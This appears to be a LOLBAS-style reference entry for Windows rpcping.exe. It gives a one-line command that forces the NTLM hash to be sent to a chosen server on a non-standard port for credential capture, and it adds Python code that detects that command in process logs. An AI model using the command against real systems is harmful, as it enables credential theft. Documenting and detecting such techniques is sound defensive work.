Rpcping.exe

Used to verify an RPC connection


Paths:


Resources:
https://github.com/vysec/RedTips
https://twitter.com/vysecurity/status/974806438316072960
https://twitter.com/vysecurity/status/873181705024266241

Acknowledgement:
Casey Smith - @subtee
Vincent Yiu - @vysecurity


Detection:



Credentials

Send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Usecase: Capture credentials on a non-standard port
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre: T1003
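
The Detection field above is empty. As an added example (not part of this entry or of rpcping itself), the following Python check flags process-creation events in which rpcping.exe runs with the -s and -u NTLM switches from the command above. The event tuples, function names and severity labels are assumptions made for the example, and only the switches shown on this page are parsed.

```python
import ipaddress
import ntpath
import shlex

# Constructed sample process-creation events (image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\RPCPing.exe", "rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM"),
    (r"C:\Windows\System32\RPCPing.exe", "rpcping.exe -s 10.20.30.40 -e 9997 -a privacy -u ntlm"),
    (r"C:\Windows\System32\RPCPing.exe", "rpcping -s fileserver01"),
    (r"C:\Windows\System32\ping.exe", "ping -s 4 10.20.30.40"),
]

# Value-taking switches that appear in the command on this page.
VALUE_FLAGS = {"-s": "server", "-e": "endpoint", "-a": "auth_level", "-u": "auth_service"}


def parse_rpcping(cmdline):
    """Return the switches from VALUE_FLAGS and their values as a dict."""
    tokens = shlex.split(cmdline, posix=False)  # posix=False keeps backslashes intact
    opts = {}
    for i, tok in enumerate(tokens[:-1]):
        name = VALUE_FLAGS.get(tok.lower())
        if name:
            opts[name] = tokens[i + 1].strip('"')
    return opts


def is_loopback(host):
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # not an IP literal, so treat it as a host name
        return host.lower() == "localhost"


def assess(image, cmdline):
    """Return None when the event is not relevant, else a finding dict."""
    if ntpath.basename(image).lower() != "rpcping.exe":
        return None
    opts = parse_rpcping(cmdline)
    if "server" not in opts or opts.get("auth_service", "").lower() != "ntlm":
        return None
    # Assumed triage rule: NTLM sent to a non-loopback host leaves the machine.
    severity = "low" if is_loopback(opts["server"]) else "high"
    return {"severity": severity, **opts}


def scan(events):
    return [f for f in (assess(img, cmd) for img, cmd in events) if f]
```

Matching on the image file name misses renamed copies of the binary, so pair this with whatever original-name or hash metadata your process telemetry records.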